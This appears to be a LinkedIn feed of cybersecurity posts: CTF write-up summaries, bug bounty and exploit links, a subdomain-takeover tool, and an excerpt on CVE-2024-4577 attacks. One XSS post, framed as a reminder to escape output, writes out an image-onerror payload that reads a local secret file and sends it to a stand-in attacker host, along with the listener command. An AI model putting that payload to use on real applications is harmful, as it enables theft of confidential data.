🚩 New CTF Write-Up Completed! 🚩 https://lnkd.in/gpSWhUfE

Just wrapped up an exciting Capture The Flag (CTF) exercise where I got to sharpen my skills in enumeration, exploitation, and privilege escalation.

🎯 Key highlights:
• Modified an exploit to create a backdoor user after the original payload failed.
• Used Burp Suite to intercept and manipulate file upload requests to bypass front-end validation.
• Successfully gained root access by leveraging a misconfigured SUID binary.

These exercises are always a great way to practice real-world techniques and stay sharp in penetration testing. 💻🔍

#CyberSecurity #CTF #PenetrationTesting #LearningByDoing
Daniel Dias’ Post
-
🚀 New CTF Write-Up: HackMyVM - Texte 🚀

Excited to share my latest Capture The Flag (CTF) write-up on the HackMyVM - Texte challenge! This challenge involved web exploitation techniques and privilege escalation to secure root access. 🛡️

Here’s a quick summary of the steps I followed:
1. Ran Nmap to identify open ports.
2. Visited the web page for vulnerabilities.
3. Exploited a file upload vulnerability.
4. Retrieved the user password from a hidden page.
5. Obtained the user flag.
6. Checked for SETUID capable binaries.
7. Inspected the binary for clues.
8. Executed the binary to gain a root shell.
9. Retrieved the root flag.

Learning Outcomes:
- Improved skills in web exploitation and binary analysis for privilege escalation.

🔗 Blog: https://buff.ly/40mMgFe

If you're keen on cybersecurity and CTF challenges, I hope this write-up inspires your own exploration!

#CyberSecurity #CTF #HackMyVM #WebExploitation #PrivilegeEscalation #InfoSec #Nmap
Texte Write-Up | CTF Write Ups
ctfs.bajirao.dev
-
Hello fellow hackers, I'm excited to share my recent bug bounty writeup on how I chained an HTML Injection to a critical SSRF. I hope this writeup can be a valuable resource for anyone. You can find the write-up linked below https://lnkd.in/dasnw_4n
The PDF Trojan Horse: Leveraging HTML Injection for SSRF and Internal Resource Access
uchihamrx.medium.com
-
Exploit for CVE-2024-8504 & CVE-2024-8503: SQLi and RCE https://lnkd.in/edFxSw6r #exploit #exploitation #cve #vulnerability #cybersecurity #informationsecurity
Exploit for CVE-2024-8504 & CVE-2024-8503: SQLi and RCE
darkwebinformer.com
-
New Blog Alert! The final blog of the file upload vulnerability series (part 3b-II) is out now. In this blog I have explained in detail about bypassing blacklists using obfuscation of file extensions. Further, there is a step-by-step solution for the Web Security Academy lab, "Lab: Web shell upload via obfuscated file extension". https://lnkd.in/gu5iVH5S #Portswigger #WebSecurityAcademy #CyberSecurity #InfoSec #WebSecurity #MediumBlogging
Insufficient blacklisting of dangerous file types, File Upload Vulnerability series (Part 3b-II)
medium.com
-
I created a tool called CNAME Sniffer! It’s designed to identify subdomains with vulnerable CNAME records that can be exploited for takeover. This tool helps you secure your digital assets and stay ahead of potential threats. Excited to share it with the community! #Cybersecurity #Infosec #SubdomainTakeover GitHub Bugcrowd HackerOne Integrity YesWeHack
GitHub - M1S0-0/CNAME-Sniffer: CNAME Sniffer is a subdomain takeover tool designed to help identify subdomains with vulnerable CNAME records that can be exploited for takeover purposes.
github.com
-
Hi everyone, hacked this lab which contains a Server Side Template Injection (SSTI) vulnerability. This web application uses the 'Handlebars' template engine in Node JS, which is vulnerable to a popular exploit: https://lnkd.in/gWjwKmUW that leads to Remote Code Execution (RCE). Using this exploit a hacker can remotely control and execute arbitrary commands on the server. #hacking #penetrationtesting #pentesting #websecurity #nodejs #cybersecurity
Lab: Server-side template injection in an unknown language with a documented exploit | Web Security Academy
portswigger.net
-
Let me stress again how important HTML escaping is in order to protect against XSS. If your application has an XSS vulnerability, nothing is safe, including OAuth tokens stored in Local/Session storage or in memory.

Consider the scenario where the application provides local access to some secret document, i.e. only for client IPs originating from the same host or network. The attacker can still steal the document if the application has an XSS vulnerability through user supplied, persisted comments reviewed (by admin) using a browser on the server machine. There is no need for a script tag, an image tag will do the job.

Short story:

Start server on the attacker's machine:
python -m http.server

Supply user comment in the target vulnerable application:
<img src="non-existing-image.png" onerror="fetch('hxxp[://]127[.]0[.]0[.]1:8080/secret.txt').then(response=>response.text().then(txt=>fetch('http://<ATTACKER_IP>:8000?text='+txt)));" />

Note*: Fang defanged URL above in CyberChef

The attacker's server will receive the exfiltrated secret document content.

Double check and review your applications if they escape all user supplied information, including user names!

#cybersecurity #ctf
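The escaping this post asks for, as an added example that is not part of the original post: a comment renderer with and without output escaping, run over constructed input. The template, function names and sample values are assumptions made for illustration.

```javascript
// Added example (not from the post): escape every user-supplied field,
// user names included, before it is written into the admin's review page.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#39;', '`': '&#96;'
};

// Safe for HTML text nodes and for quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, ch => HTML_ESCAPES[ch]);
}

// Hypothetical template, the "before": untrusted fields concatenated as-is.
function renderCommentUnsafe(c) {
  return '<li title="' + c.user + '"><b>' + c.user + '</b>: ' +
         '<span>' + c.body + '</span></li>';
}

// Same template, hardened: each field is escaped at the point of output.
function renderComment(c) {
  const user = escapeHtml(c.user);
  return '<li title="' + user + '"><b>' + user + '</b>: ' +
         '<span>' + escapeHtml(c.body) + '</span></li>';
}

// Review helper: names of the elements a browser would create from the markup.
function openedTags(html) {
  return (html.match(/<[a-zA-Z][a-zA-Z0-9]*/g) || [])
    .map(t => t.slice(1).toLowerCase());
}

// Constructed sample: the shape of the comment in the post (handler body
// replaced by a placeholder) plus a user name that tries to leave the
// title attribute.
const SAMPLE = {
  user: 'mallory" onmouseover="/* handler */',
  body: '<img src="non-existing-image.png" onerror="/* handler */" />'
};

function demo() {
  return {
    unsafeTags: openedTags(renderCommentUnsafe(SAMPLE)),
    safeTags: openedTags(renderComment(SAMPLE)),
    safeHtml: renderComment(SAMPLE)
  };
}

console.log(demo());
```

In the escaped output the only elements are the template's own `li`, `b` and `span`; the comment body and the user name arrive as inert text.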
-
https://lnkd.in/djseph-n

"CVE-2024-4577 is a flaw that allows an attacker to escape the command line and pass arguments to be interpreted directly by PHP. The vulnerability itself lies in how Unicode characters are converted into ASCII."

"we observed exploit attempts targeting this PHP flaw on our honeypot network within 24 hours of its disclosure. One such attempt involved Gh0st RAT malware (Figure 5), which is an open-source remote access tool that has been around for more than 15 years."

"there was one exploit blocked by Adaptive Security Engine that was not detected by our honeypots. In the payload seen in Figure 12, an attacker was attempting to copy a file from a server they controlled to the root directory of the target server. The copied file “up.txt” would allow the attacker to upload any additional files by using the “/xl.php” endpoint. The threat actor could use this to upload other malicious files, such as web shells or malware. Most important, by creating another way to upload files, the attacker could maintain access even after the patch for CVE-2024-4577 has been applied."

#malware #ghostrat #redtail #muhstik #xmrig #exploit #php
CVE-2024-4577 Exploits in the Wild One Day After Disclosure
akamai.com
-
First writeup about CTFs that I write in my blog 😁 It's about the CTF HackingStation, the machine I uploaded to VulNyx a few days ago. Enjoy it! https://lnkd.in/dfVGTVSc #vulnyx #ctf #cybersecurity #security #informationsecurity #infosec #pentest #pentesting #cybersec #websecurity #privesc #hacking #ethicalhacking #networksecurity #vulnerabilities #securityawareness #writeup #ctfwriteup
VulNyx: HackingStation
hackcommander.github.io
Keep it going Daniel, you are becoming the most skillful hacker on the team!